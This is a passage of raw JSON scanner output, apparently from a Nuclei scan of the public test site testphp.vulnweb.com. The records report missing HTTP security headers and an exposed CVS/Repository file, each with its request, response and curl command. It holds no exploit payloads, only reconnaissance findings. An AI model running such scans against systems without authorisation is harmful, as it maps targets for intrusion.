(Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:56 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:29.007904707Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"path\":\"/CVS/Repository\",\"matched-at\":\"http://testphp.vulnweb.com/CVS/Repository\",\"request\":\"GET /CVS/Repository HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 8\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:40:56 GMT\\r\\nEtag: \\\"4dca64a4-8\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:48 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\nacupart\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:29.90769554Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203' 'http://testphp.vulnweb.com/CVS/Repository'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.536944362Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-permitted-cross-domain-policies\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.537313321Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.537666359Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.537929864Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-resource-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.538020704Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.538136353Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.538285135Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"path\":\"/Mod_Rewrite_Shop/BuyProduct-1\",\"matched-at\":\"http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1\",\"request\":\"GET /Mod_Rewrite_Shop/BuyProduct-1 HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:41:31 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\\u003c!-- a padding to disable MSIE and Chrome friendly error page --\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:31.538344676Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36 Edg/112.0.1722.84' 'http://testphp.vulnweb.com/Mod_Rewrite_Shop/BuyProduct-1'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security 